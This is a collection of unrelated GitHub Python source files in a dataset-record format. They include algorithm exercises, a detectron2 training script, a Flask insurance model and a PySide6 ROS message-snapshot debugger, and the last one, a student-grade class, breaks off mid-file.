or isinstance(rule, KCycle):\n return table\n\n # evaluate coefficient\n table[k][r] = evaluate(r, rules, k, table, vals, [r], [k])\n\n if isinstance(r, Theta) and r.SubRule not in table[k]:\n table[k][r.SubRule] = float(table[k][r]) / k if k > 0 else 0.0\n\n return table\n\n# recursively evaluate a coefficient\ndef evaluate(r, rules, k, table, vals, r0, k0):\n def subEval(r1, k1):\n return 0.0 if r1 in r0 and k1 in k0 else evaluate(r1, rules, k1, table, vals, r0 + [r1], k0 + [k1])\n # base case\n if r in table[k]:\n return table[k][r]\n # 0 if k < valuation\n if isinstance(r, Theta) and k < vals[r.SubRule]:\n return 0.0\n elif not isinstance(r, Theta) and k < vals[r]:\n return 0.0\n # begin recursive evaluation\n rule = rules[r]\n # A = Z\n if isinstance(rule, Atom):\n return 1.0 if rule.Size == k else 0.0\n # A = B + C\n elif isinstance(rule, Union):\n return subEval(rule.SubRule1, k) + subEval(rule.SubRule2, k)\n # A = B * C\n elif isinstance(rule, Product):\n conv = 0.0\n for i in range(0,k+1):\n a, b = subEval(rule.SubRule1, i), subEval(rule.SubRule2, k-i)\n conv += a * b if a != 0.0 and b != 0.0 else 0.0\n return conv\n elif isinstance(rule, Set) or (isinstance(rule, KSet) and rule.Rel == \"<=\"):\n return 1.0\n elif isinstance(rule, Cycle) or isinstance(rule, KCycle):\n return subEval(Theta(r), k) / k if k > 0 else 0.0\n elif isinstance(rule, KSet) and rule.Rel != \"<=\":\n return subEval(Theta(r), k) / k if k > 0 else 0.0\n elif isinstance(rule, Theta):\n return k * subEval(rule.SubRule, k)\n elif isinstance(rule, Delta):\n dlt = 0.0\n for i in range(1, k+1):\n dlt += rule.Function(i) * subEval(rule.SubRule, k/i) if k % i == 0 else 0.0\n return dlt\n else: raise Exception(\"Unsupported rule \" + str(rule))","repo_name":"spritt/enumeration-of-combinatorial-structures","sub_path":"core/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":2401,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"35878485024","text":"\nclass Node:\n def __init__(self, c=''):\n self.c = c\n self.children = {}\n self.end = False\n \n 
def insert(self, word):\n        cur = self\n        for letter in word:\n            if letter not in cur.children:\n                cur.children[letter] = Node(letter)\n            cur = cur.children[letter]\n\n    def search(self, word):\n        cur = self\n        for i, letter in enumerate(word):\n            if letter == '.':  # '==' (value comparison), not 'is' (identity), for string literals\n                for child in cur.children.values():\n                    if child.search(word[i+1:]):\n                        return True\n                return False\n            elif letter in cur.children:\n                cur = cur.children[letter]\n            else:\n                return False\n        return True\n\n\nclass WordDictionary:\n\n    def __init__(self):\n        \"\"\"\n        Initialize your data structure here.\n        \"\"\"\n        self.root = Node()\n\n    def addWord(self, word: str) -> None:\n        \"\"\"\n        Adds a word into the data structure.\n        \"\"\"\n        self.root.insert(word)\n\n    def search(self, word: str) -> bool:\n        \"\"\"\n        Returns if the word is in the data structure. A word could contain the dot character '.' to represent any one letter.\n        \"\"\"\n        return self.root.search(word)\n\n\nif __name__ == '__main__':\n    w = WordDictionary()\n\n    w.addWord('a')\n    w.addWord('a')\n    print(w.search('.'))\n    print(w.search('a'))\n    print(w.search('aa'))\n    print(w.search('a'))\n    print(w.search('a.'))\n    print(w.search('.a'))","repo_name":"lukegao/leetcode-practices","sub_path":"trie.py","file_name":"trie.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"28582831112","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals, absolute_import\n\nimport six\nfrom copy import deepcopy\n\nfrom .base import BaseDataset\nfrom .fields import Field\n\n\nclass NoObjectsException(Exception):\n    pass\n\n\nclass DatasetOptions(object):\n    def __init__(self, options=None):\n        self.model = getattr(options, 'model', None)\n        self.queryset = getattr(options, 'queryset', None)\n        self.fields = getattr(options, 'fields', [])\n        self.exclude = getattr(options, 'exclude', [])\n\n\nclass DatasetMetaclass(type):\n    def __new__(cls, name, bases, attrs):\n        attrs['base_fields'] = {}\n        declared_fields = {}\n\n        try:\n            parents = [b for b in bases if issubclass(b, ModelDataset)]\n            parents.reverse()\n\n            for p in parents:\n                parent_fields = getattr(p, 'base_fields', {})\n\n                for field_name, field_object in parent_fields.items():\n                    attrs['base_fields'][field_name] = deepcopy(field_object)\n        except NameError:\n            pass\n\n        for field_name, obj in attrs.copy().items():\n            if issubclass(type(obj), Field):\n                field = attrs.pop(field_name)\n                declared_fields[field_name] = field\n\n        attrs['base_fields'].update(declared_fields)\n        attrs['declared_fields'] = declared_fields\n\n        new_class = super(DatasetMetaclass, cls).__new__(cls, name, bases, attrs)\n        opts = new_class._meta = DatasetOptions(getattr(new_class, 'Meta', None))\n\n        if new_class.__name__ == 'ModelDataset':\n            return new_class\n\n        if not opts.model and not opts.queryset:\n            raise NoObjectsException("You must set a model or non-empty "\n                                     "queryset for each Dataset subclass")\n        if opts.queryset is not None:\n            queryset = opts.queryset\n            model = queryset.model\n            new_class.queryset = queryset\n            new_class.model = model\n        else:\n            model = opts.model\n            queryset = model.objects.all()\n            new_class.model = model\n            new_class.queryset = queryset\n\n        return new_class\n\n\nclass ModelDataset(six.with_metaclass(DatasetMetaclass, BaseDataset)):\n\n    def __init__(self, *args, **kwargs):\n        included = [field.name for field in self.model._meta.fields]\n        if self._meta.fields:\n            included = filter(lambda x: x in self._meta.fields, included)\n        if self._meta.exclude:\n            included = 
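`DatasetMetaclass` above implements the classic declarative-fields pattern: at class-creation time it pops every `Field` attribute off the class body and collects it into `declared_fields`. A minimal self-contained version of that mechanism, using modern `metaclass=` syntax instead of `six.with_metaclass`:

```python
class Field:
    pass

class CollectFields(type):
    def __new__(mcs, name, bases, attrs):
        # Pop every Field off the class body into declared_fields.
        declared = {k: attrs.pop(k) for k, v in list(attrs.items())
                    if isinstance(v, Field)}
        attrs['declared_fields'] = declared
        return super().__new__(mcs, name, bases, attrs)

class MyDataset(metaclass=CollectFields):
    title = Field()
    author = Field()

print(sorted(MyDataset.declared_fields))   # ['author', 'title']
assert not hasattr(MyDataset, 'title')     # moved off the class body
```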
filter(lambda x: x not in self._meta.exclude, included)\n\n self.fields = dict((field, Field()) for field in included)\n\n self.fields.update(deepcopy(self.base_fields))\n\n self.header_dict = dict(\n (field.header or name, field.attribute or name)\n for name, field in self.fields.items())\n\n self.header_list = self.header_dict.keys()\n self.attr_list = [self.header_dict[h] for h in self.header_list]\n super(ModelDataset, self).__init__(*args, **kwargs)\n","repo_name":"joshourisman/django-tablib","sub_path":"django_tablib/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3144,"program_lang":"python","lang":"en","doc_type":"code","stars":103,"dataset":"github-code","pt":"77"} +{"seq_id":"71223091130","text":"n = int(input())\nk = int(input())\n\nboard = [[0]*n for _ in range(n)]\nfor _ in range(k):\n x, y = map(int, input().split())\n board[x][y] = 1 #해당 위치에 사과가 위치\nfor case in board:\n print(case)\n\nl = int(input())\ndummy = []\nfor _ in range(l):\n ls = input().split()\n x = int(ls[0]) #x초 뒤에\n c = ls[1] # 방향 l, d\n dummy.append((x, c))\n#dummy = [(3, D), (15, L), (17, D)]\n\nsnake = [(0, 0)]\nend = False\nsave = 0\nfor minute in range(1, 60): #뱀은 매 초마다 이동\n\n for i in range(len(dummy)):\n \n if dummy[i][0] == minute:\n \n # D 오른쪽으로 이동\n if dummy[i][1] == 'D':\n #먼저 뱀은 몸길이를 늘려 머리를 다음칸에 위치시킨다.\n snake.append( (snake[-1][0]+1, snake[-1][1]) )\n if board[snake[-1][0]+1][snake[-1][1]] == 1: #이동한 칸에 사과가 있다면\n board[snake[-1][0]+1][snake[-1][1]] = 0\n #뱀이 이리저리 기어다니다가 벽 또는 자기자신의 몸과 부딪히면 게임이 끝난다.\n if snake[-1] in dummy:\n end = True\n save = minute\n break\n if not (0<= snake[-1][0] newInterval[0]:\n break\n res.append(intervals[i])\n \n \n # BASE case wherre we need to add newinterval at starts\n # check If we need to merge with new interval or not \n if len(res) == 0:\n res.append(newInterval)\n else:\n # check if newInterval needs to be overlapped with previous one or not\n if(newInterval[0] <= res[-1][1]):\n res[-1][1] = max(newInterval[1], res[-1][1])\n else:\n res.append(newInterval)\n \n # now merge with other intervals\n for i in range(index, len(intervals)):\n st = intervals[i][0]\n en = intervals[i][1]\n # // overlapping\n if st <= res[-1][1]:\n res[-1][1] = max(en, res[-1][1])\n else:\n res.append(intervals[i])\n \n return res\n \n \n","repo_name":"cr21/PythonLeetcode","sub_path":"Intervals/LC57_insert_interval.py","file_name":"LC57_insert_interval.py","file_ext":"py","file_size_in_byte":2605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39056956743","text":"def cocn_list(l1,l2):\n output = []\n for i in l1:\n for j in l2:\n output.append(f\"{i} {j}\")\n return output\n\nif __name__ == \"__main__\":\n list1 = [\"Hello \", \"take \"]\n list2 = [\"Dear\", \"Sir\"] \n\n print(cocn_list(list1,list2))","repo_name":"apatil241995/Python-practice-problems-Week-7","sub_path":"31-03-2022/49 concat lists/using function.py","file_name":"using function.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"7456302684","text":"\nfrom google.cloud import storage\n\nimport detectron2\nfrom detectron2.utils.logger import setup_logger\nsetup_logger()\n\nfrom detectron2 import model_zoo\nfrom detectron2.config import get_cfg\n\nfrom detectron2.engine import DefaultTrainer\n\nfrom detectron2.evaluation import COCOEvaluator, inference_on_dataset\nfrom detectron2.data import build_detection_test_loader\n\nimport 
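The insert-interval solution embedded above (its beginning is truncated in this excerpt) splits the work into before/overlapping/after phases. A compact, self-contained version of the same idea:

```python
def insert_interval(intervals, new):
    """Insert `new` into sorted, non-overlapping `intervals`, merging overlaps."""
    res = []
    i, n = 0, len(intervals)
    while i < n and intervals[i][1] < new[0]:   # strictly before `new`
        res.append(intervals[i])
        i += 1
    while i < n and intervals[i][0] <= new[1]:  # overlapping: fold into `new`
        new = [min(new[0], intervals[i][0]), max(new[1], intervals[i][1])]
        i += 1
    res.append(new)
    res.extend(intervals[i:])
    return res

print(insert_interval([[1, 3], [6, 9]], [2, 5]))   # [[1, 5], [6, 9]]
print(insert_interval([[1, 2], [3, 5], [6, 7], [8, 10], [12, 16]], [4, 8]))
# [[1, 2], [3, 10], [12, 16]]
```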
os\n\nfrom pycocotools.coco import COCO\nfrom detectron2.data.datasets import register_coco_instances\n\n\ndef download_file(bucket_name = 'foodygs',\n blob_name = 'Nutrition/nutrition.csv',\n download_to_disk = False,\n destination_file_name = '../raw_data/data.csv'):\n\n \"\"\"Download a file from Google Cloud Storage.\n If download_to_disk = False then it will save to memory.\n If download_to_disk = True then it will save to your local disk.\n \"\"\"\n\n storage_client = storage.Client()\n\n bucket = storage_client.bucket(bucket_name)\n\n blob = bucket.blob(blob_name)\n\n if download_to_disk == True:\n\n blob.download_to_filename(destination_file_name)\n print(\n \"Downloaded storage object {} from bucket {} to local file {}.\".format(\n blob_name, bucket_name, destination_file_name\n )\n )\n contents = ''\n\n if download_to_disk == False:\n print(f\"retrieving {blob_name} from gcloud\")\n contents = blob.download_as_string()\n print(f\"received... test\")\n return contents\n\nprint(\"Files downloaded\")\n\n\ndef blob_coco_register():\n print('----- blob coco register -----')\n storage_client = storage.Client()\n bucket = storage_client.bucket('foodygs')\n print('-- storage and bucket has been defined')\n\n str_folder_name_on_gcs = 'foodyai_data/Training_2/images/'\n blob_train_annotations = bucket.blob('foodyai_data/Training_2/annotations.json')\n blobs = bucket.list_blobs(delimiter='/',prefix=str_folder_name_on_gcs)\n print('-- training annotations and images blobs has been created')\n\n blob_val_annotations = bucket.blob('foodyai_data/Validation_2/annotations.json')\n blobs_val = bucket.list_blobs(delimiter='/',prefix='foodyai_data/Validation_2/images/')\n print('-- validation annotations and images blobs has been created')\n\n print('-- loading the datasets in coco format and registering them as instances')\n train_annotations_path = blob_train_annotations.download_as_string()\n val_annotations_path = blob_val_annotations.download_as_string()\n print('-- annotation downloaded as string')\n\n train_coco = COCO(train_annotations_path)\n print('-- made annotation coco format')\n\n print('-- register coco instances training dataset begin')\n register_coco_instances(\"training_dataset\", {},train_annotations_path, blobs)\n\n print('-- register coco instances validation dataset begin')\n\n register_coco_instances(\"validation_dataset\", {},val_annotations_path, blobs_val)\n print('-- register coco instances end ')\n\n\n\ndef custom_config(training_dataset = (\"training_dataset\",),\n num_workers = 2,\n trained_model = \"COCO-InstanceSegmentation/mask_rcnn_R_50_FPN_3x.yaml\",\n num_classes = 323,\n batch_size = 128,\n ims_per_batch = 10,\n learning_rate = 0.00025,\n max_iter = 20,\n output_dir = \"logs/\"):\n\n \"\"\"Initialize pre-trained model\"\"\"\n\n cfg = get_cfg()\n cfg.DATALOADER.NUM_WORKERS = num_workers\n\n # Get configuration from model_zoo. 
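`download_file` above switches between an in-memory download and a file on disk. The core `google-cloud-storage` calls in isolation; the bucket and object names are placeholders, and real GCP credentials are required to run this:

```python
from google.cloud import storage  # needs GCP credentials to actually run

client = storage.Client()
bucket = client.bucket("my-hypothetical-bucket")     # placeholder name
blob = bucket.blob("path/in/bucket/data.csv")        # placeholder object

data = blob.download_as_string()         # bytes, kept in memory
blob.download_to_filename("local.csv")   # or saved to disk
```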
Check the model zoo and use any of the models\n cfg.merge_from_file(model_zoo.get_config_file(trained_model))\n\n # Loading pre trained weights # Let training initialize from model zoo\n cfg.MODEL.WEIGHTS = model_zoo.get_checkpoint_url(trained_model)\n\n # Model\n cfg.MODEL.ROI_HEADS.NUM_CLASSES = num_classes\n cfg.MODEL.ROI_HEADS.BATCH_SIZE_PER_IMAGE = batch_size\n\n # Solver\n cfg.SOLVER.IMS_PER_BATCH = ims_per_batch\n cfg.SOLVER.BASE_LR = learning_rate\n cfg.SOLVER.MAX_ITER = max_iter\n\n #Datasets\n cfg.DATASETS.TRAIN = training_dataset\n cfg.DATASETS.TEST = ()\n\n os.makedirs(cfg.OUTPUT_DIR, exist_ok=True)\n cfg.OUTPUT_DIR = output_dir\n\n trainer = DefaultTrainer(cfg)\n trainer.resume_or_load(resume=False)\n\n trainer.train()\n\n return cfg, trainer\n\n\n\ndef evaluate_model(validation_dataset = \"validation_dataset\",\n model_path = \"model_final.pth\",\n thresh_test = 0.5):\n\n \"\"\"Evaluate model with COCOEvaluater\"\"\"\n\n cfg, trainer = custom_config()\n\n cfg.MODEL.WEIGHTS = os.path.join(cfg.OUTPUT_DIR, model_path)\n cfg.MODEL.ROI_HEADS.SCORE_THRESH_TEST = thresh_test\n\n evaluator = COCOEvaluator(validation_dataset, output_dir=\"./output\")\n val_loader = build_detection_test_loader(cfg, validation_dataset)\n valResults = inference_on_dataset(trainer.model, val_loader, evaluator)\n\n return valResults, cfg, trainer\n\nif __name__ == '__main__':\n download_file()\n blob_coco_register()\n custom_config()\n #evaluate_model()\n","repo_name":"alidxmt/conv","sub_path":"foodyai/ml_logic/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":5083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"32465052519","text":"\"\"\"Insurance Model.\"\"\"\n\nfrom __future__ import annotations\nfrom typing import List, Optional\n\nfrom marshmallow import Schema, fields\nfrom marshmallow.validate import Length, OneOf, Range\nfrom sqlalchemy.orm.exc import NoResultFound\n\nfrom application import db\n\n\nclass QuestionnaireSchema(Schema):\n \"\"\"Schema for validation of Questionnaire fields.\"\"\"\n\n first_name = fields.Str(required=True, validate=Length(min=3, max=20))\n address = fields.Str(required=True, validate=Length(min=5, max=50))\n children = fields.Int(required=False, default=0, validate=Range(min=0))\n occupation = fields.Str(\n required=True, validate=OneOf(choices=['employed', 'self-employed', 'student'])\n )\n email = fields.Email(required=True)\n\n\nclass InsuranceSchema(Schema):\n \"\"\"Schema for validation of Insurance fields.\"\"\"\n\n name = fields.Str(required=True, validate=Length(min=3, max=50))\n monthly_price = fields.Float(required=True, validate=Range(min=0.0))\n\n\nclass InsuranceListSchema(Schema):\n \"\"\"Schema for validation of a list of Insurance fields.\"\"\"\n\n insurances = fields.List(\n fields.Nested(InsuranceSchema(only=('name', 'monthly_price')))\n )\n\n\nclass Insurance(db.Model): # type: ignore\n \"\"\"Insurance database model.\"\"\"\n\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(50), unique=True, nullable=False)\n monthly_price = db.Column(db.Float, nullable=False)\n\n def __init__(self, name: str, monthly_price: float):\n \"\"\"Initialize Insurance object.\n\n :param name: Type of insurance (name)\n :param monthly_price: Monthly price of the insurance\n \"\"\"\n self.name = name\n self.monthly_price = monthly_price\n\n def create(self) -> Insurance:\n \"\"\"Create insurance and save to database.\n\n :return: Insurance object\n \"\"\"\n 
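The marshmallow schemas in the insurance record above only declare constraints; validation happens when data is loaded. A sketch of how `QuestionnaireSchema`-style rules reject bad input under marshmallow 3, where `load` raises `ValidationError`:

```python
from marshmallow import Schema, fields, ValidationError
from marshmallow.validate import Length, OneOf

class MiniQuestionnaire(Schema):
    first_name = fields.Str(required=True, validate=Length(min=3, max=20))
    occupation = fields.Str(required=True,
                            validate=OneOf(['employed', 'self-employed', 'student']))

try:
    MiniQuestionnaire().load({'first_name': 'Al', 'occupation': 'pirate'})
except ValidationError as err:
    # err.messages maps each failing field to a list of error strings
    print(err.messages)
```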
db.session.add(self)\n db.session.commit()\n return self\n\n @staticmethod\n def find_insurance(name: str) -> Optional[Insurance]:\n \"\"\"Search insurance by name.\n\n :param name: Insurance name\n :return: Insurance model or None\n \"\"\"\n try:\n insurance = Insurance.query.filter_by(name=name).one()\n except NoResultFound:\n insurance = None\n\n return insurance # type: ignore\n\n @staticmethod\n def get_recommendation(occupation: str, children: int) -> List[Insurance]:\n \"\"\"Search for specific insurance for different customer realities.\n\n :param occupation: Occupation of the customer\n :param children: Number of children the customer has\n :return: List of recommended insurances for this customer\n \"\"\"\n recommendation = []\n if occupation.lower() == 'employed':\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Private')).first()\n )\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Household')).first()\n )\n elif occupation.lower() == 'student':\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Expat')).first()\n )\n else:\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Public')).first()\n )\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Legal')).first()\n )\n\n if children:\n recommendation.append(\n Insurance.query.filter(Insurance.name.contains('Life')).first()\n )\n\n return recommendation\n","repo_name":"msvolenski/insurance_api","sub_path":"application/models/insurance.py","file_name":"insurance.py","file_ext":"py","file_size_in_byte":3650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9691066026","text":"import sys, os, time\nfrom datetime import datetime\nfrom subprocess import Popen\nfrom PySide6.QtWidgets import QApplication, QMainWindow, QInputDialog, QFileDialog\nfrom PySide6.QtCore import QFile\nfrom ui_main import Ui_eTeamDebugger\nimport rvizconfigurer\nimport rospy\nfrom sensor_msgs.msg import PointCloud2, LaserScan, Image\nfrom tf2_msgs.msg import TFMessage\nimport pickle\n\ntfs = {} # last TF for each node\nmsg_storage = {} # last msg for every topic {topic->msg}\nmsg_listener = {} # listeners {topic->listener}\nsnaps = {} # snapshots saved {timestamp -> {topics, timestamp, msgs}}\nrospy.init_node(\"eTeamDebugger\")\n\nclass Listener():\n topic_name = None\n topic_type = None\n subscriber = None\n\n def setup(self,topic_name, topic_type):\n # setting listener vars and starting it\n self.topic_name = topic_name\n self.topic_type = topic_type\n self.subscriber = self.listen()\n\n def callback(self,data):\n if (self.topic_name == \"/tf\"):\n # if topic is /tf i will store it in the custom dict\n child = data.transforms[0].child_frame_id\n tfs[child] = data\n else:\n # otherwise in the normal dict\n msg_storage[self.topic_name] = data\n \n def listen(self):\n # start and return ros subscriber\n return rospy.Subscriber(self.topic_name, self.topic_type, self.callback)\n \n def send(self, msg, newname):\n # send out a specific message\n if (self.topic_name == \"/tf\"):\n # if topic name is /tf i will send all the tfs of each children inside global tfs ignoring msg and newname param\n pub = rospy.Publisher(self.topic_name, self.topic_type, latch=False, queue_size=20)\n for tf in tfs.values():\n pub.publish(tf)\n print(\"Sending tf with child: \" + tf.transforms[0].child_frame_id)\n else:\n # otherwise i will publish the single message passed\n pub = rospy.Publisher(newname, 
self.topic_type, latch=True, queue_size=1)\n pub.publish(msg)\n print(\"Sending msg to \" + newname)\n\n def stop(self):\n # stop and remove ros subscriber\n if self.subscriber is not None:\n self.subscriber.unregister()\n self.subscriber = None\n \n def resume(self):\n # recreate ros subscriber\n if self.subscriber is None:\n self.subscriber = self.listen()\n print(\"Resuming \" + self.topic_name)\n\n\nclass MainWindow(QMainWindow):\n currentRec = None\n topicType = {} \n\n def __init__(self):\n # setting up ui\n super(MainWindow, self).__init__()\n self.ui = Ui_eTeamDebugger()\n self.ui.setupUi(self)\n # binding buttons to py functions\n self.ui.addtopic.clicked.connect(self.addtopic)\n self.ui.removetopic.clicked.connect(self.removetopic)\n self.ui.newsnap.clicked.connect(self.newsnap)\n self.ui.removesnap.clicked.connect(self.removesnap)\n self.ui.playsnap.clicked.connect(self.playsnap)\n self.ui.updatetf.clicked.connect(self.updatetf)\n self.ui.exportsnapshots.triggered.connect(self.exportsnapshots)\n self.ui.exporttopic.triggered.connect(self.exporttopic)\n self.ui.importsnapshots.triggered.connect(self.importsnapshots)\n self.ui.importtopic.triggered.connect(self.importtopic)\n self.updatesnap()\n # creating default TF listener\n l = Listener()\n l.setup(\"/tf\", TFMessage)\n msg_listener[\"/tf\"] = l\n self.ui.topiclist.addItem(\"/tf\")\n msg_storage[\"/tf\"] = None\n self.topicType[\"/tf\"] = TFMessage\n\n def addtopic(self):\n # displaying dialog for topic name\n text, ok = QInputDialog.getText(self, 'Add new topic', 'Insert topic Path.\\nRemember the initial /')\n if ok:\n typ = \"\"\n allowed_type = [\"LaserScan\",\"PointCloud2\", \"TF\", \"Image\"]\n while True:\n typ, ok2 = QInputDialog.getText(self, 'Add new topic', 'Insert the type from [LaserScan, PointCloud2, TF, Image]')\n if ok:\n # checking if value is in \n if (typ in allowed_type):\n # updating ui and and global vars\n self.ui.topiclist.addItem(text)\n self.topicType[text] = typ\n # creating listener\n if typ == \"LaserScan\":\n typ = LaserScan\n elif typ == \"PointCloud2\":\n typ = PointCloud2\n elif typ == \"TF\":\n typ = TFMessage\n elif typ == \"Image\":\n typ = Image\n l = Listener()\n l.setup(text, typ)\n msg_listener[text] = l\n break;\n else:\n break; # user canceled\n else:\n break; # user canceled\n \n\n def removetopic(self):\n # getting selected topic\n sel = self.ui.topiclist.currentItem() \n if sel is None:\n return\n # removing it from ui and from listeners\n self.ui.topiclist.takeItem(self.ui.topiclist.currentRow())\n msg_listener[sel.text()].stop()\n \n def newsnap(self):\n # create a new snapshot\n # list every topic in the list and getting current timestamp\n items = [self.ui.topiclist.item(x).text() for x in range(self.ui.topiclist.count())]\n ts = datetime.now().isoformat()\n # storing each msg needed in snap\n msgs = {}\n for itm in items:\n if itm in msg_storage: \n msgs[itm] = msg_storage[itm]\n new = {\"topics\": items, \"ts\": ts, \"msgs\": msgs}\n snaps[ts] = new\n # updating ui\n self.updatesnap()\n\n def removesnap(self):\n # remove selected snapshot\n # getting selected snapshot\n sel = self.ui.snaplist.currentItem()\n if sel is None:\n return\n # removing it from global var and update ui\n del snaps[sel.text()]\n self.updatesnap()\n \n def playsnap(self):\n # broadcast snapshot\n # getting selected snapshot\n sel = self.ui.snaplist.currentItem() \n if sel is None:\n return\n # retrive needed vars\n sel = sel.text()\n topics = snaps[sel][\"topics\"] \n sel_safe = self.safe_topic(sel) # 
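`Listener.send` above republishes a stored message on a latched topic so that subscribers attaching later (for example, a freshly started RViz) still receive it. The latching pattern reduced to its essentials; this assumes a ROS 1 environment with a running roscore, and the topic name is hypothetical:

```python
# Assumes ROS 1 with rospy and a running roscore; topic name is hypothetical.
import rospy
from std_msgs.msg import String

rospy.init_node("snapshot_replayer")
pub = rospy.Publisher("/snapshot/demo", String, latch=True, queue_size=1)
pub.publish(String(data="replayed message"))  # latched: late subscribers still get it
rospy.spin()  # keep the node alive so the latched message stays available
```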
transforming timestamp in an allowed topic form\n \n # checking if RVIZ Open is selected\n if (self.ui.openrviz.isChecked()):\n # creating RVIZ config file for each topic in the snapshot\n rviz = rvizconfigurer.get_general()\n for topic in topics:\n new_name = topic + sel_safe\n if self.topicType[topic] == \"PointCloud2\":\n rviz += rvizconfigurer.get_PointCloud(new_name)\n elif self.topicType[topic] == \"LaserScan\":\n rviz += rvizconfigurer.get_LaserScan(new_name)\n elif self.topicType[topic] == \"Image\":\n rviz += rvizconfigurer.get_Image(new_name)\n rviz += rvizconfigurer.get_end(self.ui.tflist.currentItem())\n \n # storing the snapshot config file\n filename = \"snapshots/snapshot\"+sel+\".rviz\"\n f = open(filename, \"w\")\n f.write(rviz)\n f.close()\n # opening RVIZ and waiting for its opening\n Popen(\"rosrun rviz rviz -d '\"+filename+\"'\", shell=True)\n time.sleep(2)\n # publishing each msg in snapshot\n for topic in topics:\n l = msg_listener[topic]\n if topic == \"/tf\": \n l.send(None, \"\") # for /tf i don't need msg and newname\n else:\n new_name = topic + sel_safe # creating new topic name with topic + safe form of timestamp\n if topic in snaps[sel][\"msgs\"]:\n l.send(snaps[sel][\"msgs\"][topic], new_name)\n else:\n print(\"No \" + topic + \" data stored in this snapshot!\")\n\n def updatetf(self):\n # update ui with stored tfs\n self.ui.tflist.clear()\n for tf in tfs.keys():\n self.ui.tflist.addItem(tf)\n\n def exportsnapshots(self):\n # export snapshots and topic list to file\n self.stopListeners()\n tostore = [tfs, msg_storage, msg_listener, snaps, self.topicType]\n self.export(tostore, \"Save Topics and Snapshots\")\n\n def exporttopic(self):\n # export topic list to file\n self.stopListeners()\n tostore = [tfs, self.topicType, msg_listener]\n self.export(tostore, \"Save Topics\")\n\n def importsnapshots(self):\n # import snapshots and topic list from file\n global tfs\n global msg_listener\n global snaps\n global msg_storage\n data = self.imp(\"Import Topics and Snapshots\")\n if data is None:\n return\n self.stopListeners()\n\n # copying things to vars and updating ui\n tfs = data[0]\n msg_storage = data[1]\n msg_listener = data[2]\n snaps = data[3]\n self.topicType = data[4]\n #rebuilding ui and other vars\n self.ui.topiclist.clear()\n self.ui.tflist.clear()\n self.ui.snaplist.clear()\n for k in self.topicType.keys():\n self.ui.topiclist.addItem(k)\n for k in tfs.keys():\n self.ui.tflist.addItem(k)\n for k in snaps.keys():\n self.ui.snaplist.addItem(k)\n for l in msg_listener.values():\n l.resume()\n\n def importtopic(self):\n # import topic list from file\n global tfs\n global msg_listener\n global snaps\n global msg_storage\n\n data = self.imp(\"Import Topics\")\n if data is None:\n return\n self.stopListeners()\n\n # copying things to vars and updating ui\n tfs = data[0]\n self.topicType = data[1]\n msg_listener = data[2]\n print(msg_listener)\n self.ui.topiclist.clear()\n self.ui.tflist.clear()\n self.ui.snaplist.clear()\n snaps = {}\n msg_storage = {}\n for k,v in self.topicType.items():\n self.ui.topiclist.addItem(k)\n for k in tfs.keys():\n self.ui.tflist.addItem(k)\n for l in msg_listener.values():\n l.resume()\n \n\n def closeEvent(self, event):\n # stopping listeners on closing\n self.stopListeners()\n event.accept()\n\n #utils\n def imp(self, title):\n # show open file dialog and depickle selected file\n name = QFileDialog.getOpenFileName(self, title)\n if name[0] != \"\":\n with open(name[0], 'rb') as fp:\n return pickle.load(fp)\n return None\n\n def 
export(self, data, title):\n # show save file dialog and pickle passed data\n name = QFileDialog.getSaveFileName(self, title)\n if name[0] != \"\":\n with open(name[0], 'wb') as fp:\n pickle.dump(data, fp, protocol=pickle.HIGHEST_PROTOCOL)\n self.resumeListeners()\n\n def stopListeners(self):\n # stop all listeners\n for k,v in msg_listener.items():\n v.stop()\n\n def resumeListeners(self):\n # resume all listeners\n for k,v in msg_listener.items():\n v.resume()\n\n def updatesnap(self):\n # update ui snaps list \n self.ui.snaplist.clear()\n for k in snaps.keys():\n self.ui.snaplist.addItem(k)\n\n def get_topics(self):\n # get all topics from ui topics list\n topics = []\n for i in range(self.ui.topiclist.count()):\n topics.append(self.ui.topiclist.item(i).text())\n return topics\n\n def safe_topic(self, name):\n # remove banned chars for topic name\n return name.replace(\":\",\"\").replace(\"-\",\"\").replace(\".\",\"\")\n\nif __name__ == \"__main__\":\n # launching GUI\n app = QApplication(sys.argv)\n\n window = MainWindow()\n window.show()\n\n sys.exit(app.exec())\n\n\n","repo_name":"unipi-smartapp-2021/eTeamDebugger","sub_path":"debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":12226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"37479158767","text":"\"\"\"\n学生类Student:\n 属性:学号,姓名,年龄,性别,成绩\n班级类Grade:\n 属性:班级名称,班级中的学生 【使用列表存储学生】\n 方法:\n 1.查看该班级中的所有学生的信息\n 2.查看指定学号的学生信息\n 3.查看班级中成绩不及格的学生信息\n 4.将班级中的学生按照成绩降序排序\n\"\"\"\n\n\nclass Student(object):\n def __init__(self, num, name, age, gender, score):\n self.num = num\n self.name = name\n self.age = age\n self.gender = gender\n self.score = score\n\n def __str__(self):\n return '学号:{},姓名:{},年龄:{},性别:{},成绩:{}'.format(self.num, self.name, self.age, self.gender, self.score)\n\n\nclass Grade(object):\n def __init__(self, name, stu_list=None):\n if stu_list is None:\n stu_list = []\n self.name = name\n self.stu_list = stu_list\n\n def get_student(self):\n if len(self.stu_list) == 0:\n print(self.name + '这个班级里还没有学生')\n else:\n 